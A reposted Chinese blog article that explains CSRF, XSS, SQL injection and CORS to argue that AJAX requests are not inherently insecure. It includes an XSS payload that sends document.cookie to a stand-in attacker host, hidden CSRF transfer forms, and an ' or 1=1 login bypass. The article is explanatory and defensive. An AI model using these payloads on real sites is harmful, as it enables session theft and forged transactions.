AJAX請求真的不安全麽?談談Web安全與AJAX的關係。

来源:https://www.cnblogs.com/dailc/archive/2018/01/04/8191150.html
-Advertisement-
Play Games

開篇三問 1. AJAX請求真的不安全麽? 2. AJAX請求哪裡不安全? 3. 怎麼樣讓AJAX請求更安全? 前言 本文包含的內容較多,包括AJAX,CORS,XSS,CSRF等內容,要完整的看完並理解需要付出一定的時間。 另外,見解有限,如有描述不當之處,請幫忙及時指出。 __正文開始...__ ...


開篇三問

  1. AJAX請求真的不安全麽?

  2. AJAX請求哪裡不安全?

  3. 怎麼樣讓AJAX請求更安全?

前言

本文包含的內容較多,包括AJAX,CORS,XSS,CSRF等內容,要完整的看完並理解需要付出一定的時間。

另外,見解有限,如有描述不當之處,請幫忙及時指出。

正文開始...

從入坑前端開始,一直到現在,AJAX請求都是以極高的頻率重覆出現,也解決過不少AJAX中遇到的問題,如跨域調試,錯誤調試等等。

從這種,發現了一個共通現象:那就是每次和後臺人員對接時,他們都會提到AJAX請求不安全,請用普通http請求!

雖然很多時候,都是經過多翻口舌之爭後,最終後臺那邊妥協,允許部分符合條件的AJAX請求。但是,我卻很糾結一個問題:AJAX請求真的不安全麽?為什麼我自己寫後臺時並沒有發現這個問題?

於是,開始準備搜集資料,結合自己已有的認知,整理成一份解決方案,分析AJAX請求真的不安全麽?哪裡不安全?,後續遇到類似的問題就直接向對方拋出一篇文章

大綱

  • AJAX請求真的不安全麽

    • AJAX不安全的說法從何而來
  • 常見的幾種Web前端安全問題

    • CSRF簡介

    • CSRF與AJAX的關係

    • XSS簡介

    • XSS與AJAX的關係

    • SQL註入簡介

    • SQL註入與AJAX的關係

  • AJAX和HTTP請求的區別

  • CORS與AJAX安全性之間的關聯

    • CORS與AJAX關係的簡介

    • 為什麼要配置CORS?

    • CORS會配置些什麼信息?

    • CORS Origin: *的安全性

  • 再看,AJAX請求真的不安全麽?

  • AJAX請求哪裡不安全?

  • 怎麼樣讓AJAX請求更安全?

AJAX請求真的不安全麽

首先,先說一個定論:AJAX請求是否安全,由服務端(後臺)決定

有這樣一個說法:如果某個Web應用具備良好的安全性,那麼再怎麼用“不安全的AJAX”也削弱不了它的安全性,反之如果應用本身存在漏洞,不管用何種技術請求,它都是不安全的

為何會有這種說法?因為在Web應用中,客戶端輸入不可信是一個基本原則

AJAX不安全的說法從何而來?

在AJAX出現時,那時的服務端還是很古老的那一批,因此完全沒有考慮到AJAX出現後,前端請求方式會變得異常複雜,造成以前的安全策略已經無法滿足要求了,導致大批的後臺安全漏洞曝光。。。

很顯然,都是因為AJAX出現後曝光了更多的安全漏洞,導致它看起來很危險(因為AJAX出現後,請求方式變多了,以前的架構在新的請求中就可能出現更多漏洞)

So,AJAX不安全的說法自然擴散到了各個角落。

常見的幾種Web前端安全問題

要知道AJAX請求是否安全,那麼就得先知道Web前端中到底有那幾種安全問題

1.XSS(跨站腳本攻擊)(cross-site scripting)

    -> 偽造會話(基於XSS實現CSRF)
    
    -> 劫持cookie
    
    -> 惡意代碼執行

2.CSRF(跨站請求偽造)(cross-site request forgery)

    -> 偽造用戶身份操作
    
3. SQL註入

...(其它暫且不提)

如上,Web前端中的安全問題主要就是這幾大類(僅列舉部分做分析),所以我們首先要分析AJAX與這幾大類之間的關係。(XSSCSRF,在下文也會做簡單介紹。)

CSRF簡介

CSRF,特征很簡單:冒用用戶身份,進行惡意操作

時至今日,這項安全漏洞已經被人們剖析的很透徹了,隨便Google,百度之,都會找到很多的解釋。這裡也用一張圖來先做簡單描述:

(註,下麵介紹參考了來源文章中的描述,譬如圖就是參考了來源中的博文後重繪的)

所以,我們看到關鍵條件是:

1. 採用cookie來進行用戶校驗

2. 登錄受信任網站A,併在本地生成Cookie

3. 在不登出A的情況下,訪問危險網站B

一般在(4)惡意網站(B)的攻擊手段如下(必須是指向A的地址,否則無法帶上cookie):

// 1.譬如在網站內的圖片資源中潛入惡意的轉賬操作
<img src=http://www.bank.example/transfer?toBankId=hello&amount=1000000 width='0' height='0'>

// 2.構建惡意的隱藏表單,並通過腳本提交惡意請求
<iframe style="display: none;" name="csrf-frame"></iframe>
<form method='POST' action='http://www.bank.example/transfer' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='toBankId' value='hello'>
  <input type='hidden' name='amount' value='1000000'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

而且,從頭到尾,攻擊網站都沒有獲取到過 cookie,都是通過瀏覽器間接實現(利用Web的cookie隱式身份驗證機制),所以HttpOnly並不會影響這個攻擊

最後說下,幾種常見的CSRF防禦手段:

1. 驗證HTTP Referer欄位(非常簡單,但是鑒於客戶端並不可信任,所以並不是很安全)
(防止CSRF,檢查Referer欄位簡單直接,但是其完全依賴瀏覽器發送正確的Referer欄位。
雖然http協議對此欄位的內容有明確的規定,但並無法保證來訪的瀏覽器的具體實現,
亦無法保證瀏覽器沒有安全漏洞影響到此欄位。並且也存在攻擊者攻擊某些瀏覽器,篡改其Referer欄位的可能。)

2. 在請求地址中添加token並驗證
(譬如post中,以參數的形式加入一個隨機產生的token)

CSRF與AJAX的關係

上文中,我們看到CSRF的前提是cookie驗證用戶身份,那麼它與AJAX的關係大麽?

我們先分析AJAX中帶cookie驗證的情況:

1. AJAX受到瀏覽器的同源策略限制

2. AJAX預設無法請求跨域的介面
(當然後臺可以配置`Access-Control-Allow-Origin: *`之類的允許所有的跨域請求)

3. AJAX請求無法攜帶跨域cookie
(如果強行開啟withCredentials,必須服務端配合認證,無法用作攻擊)

嗯哼...看到這,基本就可以認為CSRF與AJAX請求無緣了。。。

譬如假設上圖中第4部分的請求由AJAX發起,假設網站A已經允許了Access-Control-Allow-Origin: *,由於網站B與網站A是不同功能變數名稱,所以存在跨域,根據同源策略,請求時根本就無法攜帶cookie,故而無法通過身份認證,攻擊失敗。。。
就算強行開啟withCredentials,攜帶跨域cookie,但是由於服務端並不會單獨配置網站B的跨域cookie(需配置Access-Control-Allow-Credentials: true,而且這時候不允許設置Allow-Origin: *),所以肯定認證失敗

可以看到,就算Access-Control-Allow-Origin: *允許所有來源的AJAX請求,跨域的cookie預設情況下仍然是無法攜帶的,無法CSRF

所以說,結論是:CSRF與AJAX無關

XSS簡介

既然CSRF與AJAX關係不大,那麼XSS應該會與AJAX有很大關係吧?(要不然為什麼一直說AJAX請求不安全,對吧。)。那麼請繼續看下去(本文中只限JS範疇)

XSS(cross-site scripting),看起來簡寫應該是css更合適。。。但是為了和層疊式樣式表區分,就用XSS簡寫表示

XSS的特征也可以概括為:跨域腳本註入,攻擊者通過某種方式將惡意代碼註入到網頁上,然後其他用戶觀看到被註入的頁面內容後會受到特定攻擊

相比CSRF,XSS囊括的內容更多,而且往往是多種攻擊形式組合而成,這裡以前文中介紹的幾種為例:

1.cookie劫持

同樣,頁面中有一個評論輸入,輸入後會,因為後臺的漏洞,沒有過濾特殊字元,會直接明文保存到資料庫中,然後展示到網頁時直接展示明文數據,那麼如下

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<form action="saveComment.jsp" method="post"> 
     請輸入評論內容:<BR> 
     <input name="content" type="text"> 
     <input type="submit" value="確認">
</form> 

然後攻擊者分析後,輸入

<script>window.open("http://www.attackpage.com/record?secret=" + document.cookie)</script>

保存文章。很簡單的代碼,由於沒有過濾腳本,那麼其它用戶登陸後,在看到這篇文章時就會自動將他們的cookie信息都發送到了攻擊者的伺服器。
攻擊者可以在cookie(譬如jsessionid對應的session)有效期內拿它們冒充用戶操作。

需要註意,這裡和CSRF的區別是,這裡是拿到了cookie後主動冒充用戶的,而CSRF中根本就不知cookie,僅利用瀏覽器的隱式校驗方式冒充用戶。

2.會話偽造

同樣是評論漏洞的示例。

攻擊者輸入(舉例比喻)

<img src=http://www.bank.example/transfer?toBankId=hello&amount=1000000 width='0' height='0'>

然後,接下來發生的故事就和CSRF中提到的一致。這種情況就是基於XSS而開展的CSRF,也有人喜歡稱之為XSRF

需要註意,這裡並沒有自己拿到cookie,而是CSRF中提到的利用瀏覽器的隱式驗證機制來冒充用戶。

3.其它惡意代碼執行

其實上面的cookie劫持以及會話偽造都算是惡意代碼執行,為了區別,這裡就專指前端的流氓JS。

譬如前面的評論中的輸入可以是:

譬如市面上盛行的網頁游戲彈窗等。
譬如乾脆直接讓這個頁面卡死都可以。
譬如無限迴圈。

這裡再提一點,上述都是從前端輸入作為入口的,但實際上有一類的輸入也不可忽視,那就是:富文本攻擊

它的特點就是: 富文本中註入了腳本,並且前後端未進行過濾,導致直接輸出到了頁面中

因為存在很多頁面,都是將富文本內容展示到網頁上的,沒有進行過濾(哪怕時至今日,仍然有不少頁面),這樣只要富文本中有註入腳本,基本就中招了。。。

結論:

只要最終能向頁面輸出可執行的腳本語句,那麼就是有漏洞,XSS攻擊都有可能發生。

而且,基本上xss漏洞是很廣泛的,雖然攻擊類型很被動,也需要大量時間分析,但勝在大量的網站上都存在(特別是那種長期不更新的)

再提一點。上述的介紹更多的是從造成的後果來看,但其實如果從攻擊手動來看的話可以分為幾大類型:反射型XSS攻擊(直接通過URL註入,而且很多瀏覽器都自帶防禦),存儲型XSS攻擊(存儲到DB後讀取時註入),還有一個DOM-Based型

上述示例中都是存儲型,具體更多內容網上已經有很詳細的資料,這裡不再繼續深入,放一張圖鞏固下。

如何預防XSS:

  • 輸入過濾,不信任用戶的任何輸入,過濾其中的“<”、“>”、“/”等可能導致腳本註入的特殊字元,
    或者過濾“script”、“javascript”等腳本關鍵字,或者對輸入數據的長度進行限制等等,
    還得考慮攻擊者使用十六進位編碼來輸入腳本的方式。

  • 輸出進行編碼,和輸入過濾類似,不過是從輸出上著手,數據輸出到頁面時,經過HtmlEncoder等工具編碼,這樣就不會存在直接輸出可執行的腳本了

  • cookie設置http-only,這樣用腳本就無法獲取cookie了
    (這樣只有瀏覽器向Web伺服器發起請求的時才會帶上cookie欄位,避免了XSS攻擊利用JavaScript的document.cookie獲取cookie)

  • Cookie防盜,儘可能地避免在Cookie中泄露隱私,如用戶名、密碼等;
    或者,為了防止重放攻擊,可以將Cookie和IP進行綁定,這樣也可以阻止攻擊者冒充正常用戶的身份。

  • 註意,特別是後臺,一定不能信任前端的輸入,需要過濾與校驗

XSS與AJAX的關係

以上分析了XSS造成一些影響與問題,仍然發現:與AJAX關係不大,因為這些問題不管用不用AJAX都會發生。

看看這種情況,譬如上述的富文本註入中:

1. 某個介面採用AJAX交互

2. AJAX請求完後將對應富文本欄位顯示到了頁面上-譬如innerHTML

但是,這真的與AJAX無關,這是前後端沒有進行輸入輸出過濾而造成的後果。

所以,還是那句話:如果某個Web應用具備良好的安全性,那麼再怎麼用“不安全的AJAX”也削弱不了它的安全性,反之如果應用本身存在漏洞,不管用何種技術請求,它都是不安全的

SQL註入簡介

sql註入展開將也是一門很大的學問,很早以前更是大行其道(當然,現在...),這裡僅僅舉幾個最極端的示例。

前提是後臺沒有過濾前端的輸入數據,否則根本無法生效

假設頁面A中有一個登陸查詢存在拙劣的sql註入漏洞,這樣子的:(最極端,最傻的情況)

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<form action="login.jsp" method="post"> 
     請輸入用戶名與密碼:<BR> 
     <input name="name" type="text"> 
     <input name="password" type="text"> 
     <input type="submit" value="登陸">
</form> 

在接收到登陸請求後,服務端的實際執行代碼時是:

String sql = "SELECT * FROM  users  WHERE name = '" + name + "' AND password = '" + password + "'";

然而有攻擊者分析出後臺可能存在漏洞,嘗試sql註入攻擊,輸入

name = ' or 1=1
password = anything

那麼這樣,後臺接收到數據後,實際上查詢的結果是

SELECT * FROM  users  WHERE name = ' ' or 1=1  AND password = 'anything'  

故而,攻擊者成功的繞過的用戶名,利用後臺漏洞登陸了。

當然了,像這類這麼低級的漏洞,現象幾乎已經不存在了,往往這類型漏洞需要仔細分析,耗時。(又或者是有內姦。。。)

SQL註入與AJAX的關係

額,從上述的示例中看不出和AJAX有什麼關係。但是我們可以這樣假設:

1. 有一個介面,接收AJAX post的數據

2. 數據中有一個欄位 'name',後臺接收到後沒有進行過濾,直接如上面的演示一樣,執行sql語句了

3. 所以AJAX中如果給那個欄位傳入非法的註入信息,就會觸發這個漏洞,導致攻擊生效

對,就是這樣極端的情況下才會發生,而且與AJAX並沒有關係,因為換成任何一種其它請求都會有類似的情況。。。

所以說,結論是:SQL註入與AJAX無關

AJAX和HTTP請求的區別

從本質上將:AJAX就是瀏覽器發出的HTTP請求,只不過是瀏覽器加上了一個同源策略限制而已。

AJAX請求的XMLHTTPRequest對象就是瀏覽器開放給JS調用HTTP請求用的。

那麼AJAX和HTTP的區別呢?列出以下幾點:

  • AJAX請求受到瀏覽器的同源策略限制,存在跨域問題

  • AJAX在進行複雜請求時,瀏覽器會預先發出OPTIONS預檢(HTTP自己是不會預檢的)

  • 從使用角度上說,AJAX使用簡單一點,少了些底層細節,多了些瀏覽器特性(如自動帶上同域cookie等)

  • 所以說,和認證上的HTTP請求的區別就是-多了一次瀏覽器的封裝而已(瀏覽器會有自己的預處理,加上特定限制)

但是,從最終發出的報文來看,內容都是一樣的(HTTP協議規範的內容),AJAX是發送HTTP請求的一種方式

所以從這一點可以得出一個結論:AJAX本質上安全性和HTTP請求一樣

CORS與AJAX安全性之間的關聯

按照前文中提到的內容,基本無法得出AJAX與請求不安全的關聯。那麼接下來,再繼續分析,如果使用了跨域資源共用(CORS)後的安全性。
(因為往往ajax都會伴隨著CORS)

CORS與AJAX關係的簡介

這是一個跨域共用方案,大致流程就是:(僅以複雜請求的預檢舉例-這一部分要求提前掌握CORS相關知識)

1. 前端AJAX請求前發出一個OPTIONS預檢,會帶一堆相關頭部發送給服務端

2. 服務端在接受到預檢時,檢查頭部,來源等信息是否合法,合法則接下來允許正常的請求,
否則直接無情的拒絕掉

3. 瀏覽器端如果收到服務端拒絕的信息(響應頭部檢查),就拋出對應錯誤。
否則就是正常的響應,接下來發出真正的請求(如POST)

請求和響應的頭部信息大概如下:

Request Headers

// 在CORS中專門作為Origin信息供後端比對,表示來源域。
Origin: http://xxx
Access-Control-Request-Headers: X-Requested-With
// 所有用setRequestHeader方法設置的頭部都將會以逗號隔開的形式包含在這個頭中,一般POST請求中就會帶上
Access-Control-Request-Method: OPTIONS

Response Headers

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Origin: http://xxx

最終,客戶端發出的請求,必須符合服務端的校驗規則才能正確,服務端才會返回正確頭部,否則只會請求失敗。報跨域錯誤。

以上僅是簡介,更多信息可以參考來源中的ajax跨域,這應該是最全的解決方案了

為什麼要配置CORS?

因為同源策略限制,AJAX無法請求跨域資源,CORS可以解決AJAX跨域請求問題。

因此:在本文中,配置CORS只是為了AJAX能跨域請求

CORS會配置些什麼信息?

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Origin: http://xxx

如上,加上這個配置後,必須符合要求的才算是正常的請求,否則就會拒絕掉,一般AJAX跨域的話都會有OPTIONS,所以在預檢中就做了這一步。

可以看到,關鍵的可變信息是:Access-Control-Allow-Origin: http://xxx

這個配置就是功能變數名稱白名單,規定在什麼樣的功能變數名稱下才能進行AJAX跨域請求。

CORS Origin: *的安全性

關鍵問題來了,在上面的CORS配置是這樣的:

Access-Control-Allow-Origin: http://xxx

但是這個配置只允許特定功能變數名稱訪問,鑒於前端的複雜性,有時候調試起來不是很方便,因此有時候,會偷懶的設置為:

Access-Control-Allow-Origin: *

這個代表所有來源的跨域AJAX請求都能正常響應。

接下來我們再來分析設置Origin: *可能帶來哪些問題。(都是基於AJAX的情況)

問題1:會對cookie認證造成影響麽?

不會。雖然*代表了所有來源都能正常請求,但是同源策略下,是無法帶上跨域cookie的。因此根本無法用身份驗證。

而且,就算用withCredentials強行帶上跨域cookie,因為後臺沒有支持,所以會報錯。(這可以看成是CORSs模型的最後一道防線)

再者,後臺就算配置Access-Control-Allow-Credentials允許跨域cookie,但是這時候的安全策略是Origin不允許為,必須是一個明確的地址。
(否則你就可以看到瀏覽器的報錯信息-跨域cookie時,Origin不允許為

問題2:如果偽造Origin頭部呢?

首先,標準的瀏覽器中是不允許你偽造的(除非有嚴重漏洞),所以一般需要通過模擬客戶端請求偽造。

但是。在非瀏覽器情況下,本來就沒有同源策略。這又是何必。。。

所以說,偽造Origin與CORS並沒有關係。

問題3:如果後臺本來就存在漏洞呢?

做這樣一個假設,假設用戶所在網路的內網中有一臺內網伺服器,並且配置了允許所有的跨域請求:(當然,外網是請求不到內網的)

// 允許任何來自任意域的跨域請求
Access-Control-Allow-Origin: *

再假設內網伺服器上恰巧存在敏感資源,並且沒有額外設防,只要內網就能訪問。譬如:

192.168.111.23/users.md

然後用戶訪問了惡意網頁,而像HTML之類的網頁都是下載到本地執行的,
正好網頁內有惡意代碼,去向192.168.111.23/users.md請求資源,再將接收到的服務端返回發送到攻擊者伺服器。
(因為加了Origin為*,而且AJAX是由本地瀏覽器發出的,所以用戶下載到本地的惡意網站是可以訪問到用戶內網中的後臺的)

然後這些敏感數據就這樣被盜取了。

But,這是因為服務端漏洞而存在的問題,設置Origin為的後臺上為何要放置敏感資源?正常設置為Origin為的最大作用是用作公共API。
而且更重要的是,為何敏感資源就這樣輕易的被獲取了?為什麼沒有二次驗證?

SO,後臺本身有漏洞,所以才導致被攻擊,AJAX恰好是攻擊的手段之一(除了AJAX外還會有其它的方式),所以很多鍋都甩到了AJAX頭上。

這樣,可以得出一個保守點的結論:

Origin如果不是*,AJAX請求並不會有安全問題,如果是*,可能會由於後臺的漏洞,不經意間,AJAX就被作為一種攻擊手段了,導致了出現AJAX不安全的說法

再看,AJAX請求真的不安全麽?

仍然是最初的結論:

如果某個Web應用具備良好的安全性,那麼再怎麼用“不安全的AJAX”也削弱不了它的安全性,反之如果應用本身存在漏洞,不管用何種技術請求,它都是不安全的

我們可以看到,XSS也好,CSRF也好,以及其它隱藏的可能漏洞也好,本質上都是後臺已有漏洞造成的問題,AJAX最多是被用作一種攻擊手段(甚至某些裡面AJAX還無法使用)

提到AJAX請求不安全的,譬如有CORS裡面配置Origin: *造成某些極端情況下能通過AJAX發出攻擊。但事實上這也是其中的一種攻擊手段而已,沒有AJAX,該不安全的仍然不安全。

譬如還有的說法是:因為在AJAX出現以前,如果出現安全漏洞,容易被察覺,但AJAX是非同步的,更容易隱式的出現安全問題。。。這也與安全性的本質無關。

最重要一點,從Web應用安全形度來談,Web應用必須從不信任客戶端。所以不要再把鍋甩給AJAX。

AJAX請求哪裡不安全?

同上,AJAX本身並不存在這種安全問題。

不過有一點需註意,如果使用了CORS方案。

1. Allow-Origin可以設置特定的值,過濾特定的白名單

2. 對於一些公共的API,可以直接將Allow-Origin設置為`*`

3. 當然,如果確認後臺沒有這些隱藏漏洞,可以直接使用`*`,畢竟也只是針對瀏覽器的同源策略而已,影響沒有那麼大。

怎麼樣讓AJAX請求更安全?

仍然是文中反覆提到的結論:

讓Web後臺更安全,則AJAX請求也更安全,反之後臺有漏洞,不管怎麼樣都是不安全的

寫在最後的話

這樣的話,應該可以把AJAX不安全的鍋甩掉了吧?

附錄

參考資料


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 方法1: 用SET PASSWORD命令 首先登錄MySQL。 格式:mysql> set password for 用戶名@localhost = password('新密碼'); 例子:mysql> set password for root@localhost = password('123' ...
  • 原鏈接 作者:大漠孤煙直 背景及現象 線上生產環境在某些時候經常性的出現資料庫操作死鎖,導致業務人員無法進行操作。經過DBA的分析,是某一張表的insert操作和delete操作發生了死鎖。簡單介紹下資料庫的情況(因為涉及到真實數據,這裡做了模擬,不影響具體的分析和分析的結果。)假設存在如下2張表: ...
  • 項目的創建及配置 因為Neo4j依賴的jar包比較多,所以推薦使用Maven來管理。 首先創建一個Maven Project,添加依賴: 使用的是3.2.6版本,對應版本的Neo4j安裝地址摸我。 使用嵌入式資料庫 配置好之後,就可以開始了,第一步是學習開啟和關閉資料庫。 無論是創建一個新的資料庫, ...
  • 一、概念篇 1、消息摘要-Message Digest 消息摘要:在消息數據上,執行一個單向的hash函數,生成一個固定長度的hash值,這個Hash值就是消息摘要,也成為數字指紋。 消息摘要特點: (1)無論輸入消息多長,計算出來的消息摘要長度總是固定的; (2)不可逆性,通過摘要無法推算出消息本 ...
  • 2018年上班的第二天,就這樣背了一個大鍋。我們項目中有一個搜索功能,在這一期的版本中,為了增強優化,去除了過濾空格的請求,這樣或許能增加很好的用戶體驗,恰恰相反,偷雞不成蝕把米。沒想到蘋果系統的輸入法竟然能自動聯想,在沒有選擇漢字的時候,竟然能聯想出來一大堆智能拼音,what???還有這種操作?? ...
  • 從一開始接觸編程就多次聽到編程得養成好的編碼習慣。的確,不讓好的編碼成為習慣,也就只能在隨意的代碼風格裡放縱了(網上瀏覽到的代碼是有這樣的吧)。 在網上也看了很多人的總結,學到很多。將其中的部分進行彙總,這次的隨筆大部分只是文字的搬運工,如有誤還請指正。 一.標識符命名(儘量以最少的字元表達完整的含 ...
  • 前言 18年元旦三天內和朋友突擊了下,勉強是將雛形做出來了,後續的API慢慢完善。(當然了,主力還是那個朋友,本人只是初涉iOS,勉強能看懂,修修改改而已) 大致內容如下: JSBridge核心交互部分 、`page`等部分常用API的實現(其它慢慢完善) 組件(自定義)API拓展的實現 API的權 ...
  • 1.1 基本介紹 我們先去github上面瞭解它https://github.com/alibaba/AndFix 請原諒我的盜圖行為,英文解釋我就不貼了我自己也看不懂,大致的意思的就是要想盡一切辦法給導致我們崩潰的那個類的某個方法去動手術把它弄好,而這裡就有一個概念那就AndFix.apatch補 ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...